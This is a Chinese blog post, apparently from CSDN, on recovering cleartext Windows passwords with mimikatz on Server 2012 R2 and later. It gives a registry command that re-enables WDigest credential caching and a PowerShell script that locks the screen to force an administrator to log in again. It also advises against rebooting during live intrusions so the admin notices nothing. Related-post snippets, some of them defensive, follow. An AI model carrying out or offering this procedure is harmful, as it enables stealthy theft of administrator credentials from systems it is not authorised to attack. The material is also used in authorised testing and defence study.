Winserver2012R2系统之后的密码明文抓取方式

已于 2024-05-25 11:50:48 修改
阅读量545 收藏 3
点赞数 4
文章标签: 服务器 安全
于 2024-05-20 20:18:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CQ17743254852/article/details/139072865
版权

目录

mimikatz抓取明文原理

Winserver2012R2系统之后的密码明文抓取方式

mimikatz抓取明文原理

在Windows2012以及win10之前,登录过程是不一样的,首先winlogon进程会把用户输入的用户名和密码传给lsass.exe进程,此进程首先会在内存中存储一份用户名密码的明文,然后将明文做NTLMhash的加密生成密文,再和SAM文件内的hash值进行比对,相同则登录成功,反之登录失败

所以mimikatz利用lsass进程,直接在内存中将明文密码抓出来

但是微软也因此更新了系统的登录过程,和原来唯一不同的是lsass进程将不会在内存保存明文密码,这样一来mimikatz抓出来的密码就为null了

Winserver2012R2系统之后的密码明文抓取方式

注意:

1.只针对windows服务器系统有效,win10实测不行会报错

2.系统权限

先修改注册表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

 然后执行ps1脚本让服务器锁屏,需要管理员重新登录

Function Lock-WorkStation {

$signature = @"

[DllImport("user32.dll", SetLastError = true)]

public static extern bool LockWorkStation();

"@

$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru

$LockWorkStation::LockWorkStation() | Out-Null

}

Lock-WorkStation

上传到服务器执行

 管理员重新登陆

此时我们再用mimikatz抓取,可以看到抓到了

除了执行ps1脚本让服务器锁屏外,还可以重启服务器,但实战渗透过程中,最好别重启服务器,第一那会影响正常业务,第二管理员会很快发现服务器异常

参考文章:

Win10及2012系统以后的明文抓取方式-安全客 - 安全资讯平台

Catherines7
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透(二十九)之Windows协议认证和密码抓取-Windows-2012R2之后抓取密码方式抓取密码的防范措施
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-15 560
所以,以往的例如:Windows 7,Windows 8,Windows Server 2008R2和Windows Server 2012也可以更新该补丁后获得上述安全保护机制。在windows server 2012 R2中,新增了一个Protected Users 安全组,将用户加入到该组,用户的明文密码就不会被获取。这种情况对方只要输入密码,只要一输入密码密码就会以明文的形式保存在内存中,我们就又能够明文密码了。我们还有一种方式是通过锁屏,来让对方在输入一次密码,然后我们抓取密码
windows 2012 明文密码方法
Jiajia2017的博客
05-28 719
mickey | 2015-05-11 11:52 默认配置是不到明文密码了,神器mimikatz显示Password为null Authentication Id : 0 ; 121279 (00000000:0001d9bf) Session : Interactive from 1 User Name : mickey Domain ...
win10及win2012之后系统明文抓取方式
聚鼎安全
03-29 3531
原文地址:https://www.anquanke.com/post/id/175364 抓取明文:手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录 = 截取明文密码 1.procdump+mimikatz获取win10/win2012 R2用户明文密码 测试环境:win10企业版和win2012 R2 版本 工具下载:链接:https://pan.baidu.c...
几款优秀的Windows密码抓取工具
LuckySec
03-24 6690
前言 本篇介绍几款优秀的Windows上的密码抓取工具,每个工具都有自己的特点非常实用,欢迎补充。 0x01 Mimikatz 个人点评:这款工具非常强大,公认的Windows密码神器。 1. 简介 Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码,hash,PIN码和kerberos票证。mimikatz还可以执行哈希传递,票证传递或构建Golden票证 项目地址:https://github.com/gentilkiwi/mimikatz/ 2. 使用 cmd运行
Windows抓取密码的四种方式&&其他各类密码抓取
huohaowen的博客
03-22 2168
对于Windows(不是域环境)我们有四种方法去抓取它的密码在这次的blog,我们还是用的mimkatz。
windows
zengliguang的专栏
01-20 1844
Windows平台下包可以使用Windows自带的netsh工具或第三方包工具。
winserver2012 r2安装SSMS需要的msu
03-01
Windows Server 2012 R2操作系统上安装SQL Server Management Studio (SSMS) 是一个必要的步骤,特别是当你需要管理SQL Server数据库时。SSMS是一个强大的图形化工具,它允许用户设计、配置、管理和开发SQL Server...
winServer2012R2系统镜像ISO【中文版】
11-24
winServer2012R2系统镜像ISO
联想服务器SR650 raid卡530-8i 驱动装winserver2012 R2系统
11-17
在本案例中,"win2012r2-64"可能是包含所需驱动程序的文件,这可能是一个ZIP或RAR压缩文件,内含适用于64位Windows Server 2012 R2的RAID卡530-8i驱动。 安装步骤大致如下: 1. **准备阶段**:下载并解压"win2012...
解决WinServer2012操作系统安装 SQLServer2008R2失败,需要打sxs补丁
08-15
总之,解决WinServer2012上安装SQL Server 2008 R2失败的问题,主要在于安装.NET Framework 3.5和IIS,以及确保所有必要的系统组件都已到位。通过遵循这些步骤,你应该能够成功安装并运行SQL Server 2008 R2,从而...
Windows Server 2012 R2 镜像SXS
12-13
Windows Server 2012 R2操作系统中,安装.NET Framework 3.5时遇到问题,提示“安装角色或功能失败,找不到源文件”。这个问题通常与SXS(Side-by-Side)组件有关,该组件是Windows系统用于支持不同版本的.NET ...
VS2012 包代码
mnhdxhcky的博客
12-26 974
// capture.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include "iostream" #include "winsock2.h" #include "mstcpip.h" #pragma comment(lib,"WS2_32") using namespace std; void DecodeIPPacket(char * ...
从mimikatz抓取密码学习攻防
hongduilanjun的博客
07-21 1818
前不久在使用mimikatz抓取hash的时候遇到了报错,本着追根溯源的原则去查看了mimikatz抓取密码的原理。在学习的过程中发现了mimikatz的每种报错都有不同的原因,本文就从mimikatz的防御角度出发来分析如何防御mimikatz抓取密码。...
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 2000
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash。
内网渗透体系学习4
m0_55772907的博客
10-25 895
内网
cs与msf权限传递以及mimikatz抓取win2012明文密码
最新发布
huizhaohaha的博客
05-25 772
我查找过资料得出,Cobalt Strike 的前身是 Armitage,而 Armitage 又可以理解为 Metasploit Framework 的图形界面版,因此 Cobalt Strike 与 Metasploit Framework 在很多地方都是兼容的,所以我们便可以将 Metasploit Framework 攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike 的会话也能够传递到 Metasploit Framework。
windows 本地安全设置 灰色_window系统安全加固
weixin_39621488的博客
12-01 1581
windows 系统账号特性一般我们使用的普通的windows操作系统,对用户的密码是没有限制的,一般在家用版的windows中都会在一开始的时候给由你创建一个用户。而且对于家用的windows来说你的电脑不设置密码也是可以的。但是对于windows server来说,这是不行的。windows服务器对于账号和密码是有严格的要求的,而且windows服务器里面可能有很多的用户,因为每一...
防范攻击者抓取明文密码和散列值
weixin_45007073的博客
06-30 400
防范方法设置AD2012R2功能级别安装KB2871997通过修改注册表禁止在内存存储明文密码防御mimikatz 设置AD2012R2功能级别 我们先把Administrator账户添加到Protected Users用户组中,然后在mimikatz上输入以下命令 privilege::debug sekurlsa::logonpasswords mimikatz并没有将用户的明文密码或散列值读出,由此看出Protected Users用户组的保护方式是有效的 安装KB2871997 KB28719
win server 2012 r2 iso
06-06
Win Server 2012 R2 ISO是一种Windows服务器操作系统的镜像文件,它包含了安装该操作系统所需的所有文件。该操作系统是微软公司推出的一款高性能服务器操作系统,主要用于企业级网络环境。 Win Server 2012 R2 ISO提供了许多强大的功能和工具,例如虚拟化、云计算、存储、网络、安全等,可以大大提高IT系统的可靠性、灵活性和安全性。它支持64位的硬件架构,可以利用更大的内存和更高速的处理器来提高系统性能。 此外,Win Server 2012 R2 ISO还可以通过安装各种可选的功能组件来满足不同的服务器需求,如网络服务、IIS、远程桌面服务、Hyper-V、SQL Server等。该操作系统还拥有较好的兼容性,可以与许多第三方软件和硬件设备完美搭配使用。 总之,Win Server 2012 R2 ISO是一款功能强大、安全可靠、性能优异的Windows服务器操作系统,适用于各种企业级网络环境。无论是建立内部服务器还是外部托管服务,Win Server 2012 R2 ISO都可以提供可靠的技术支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值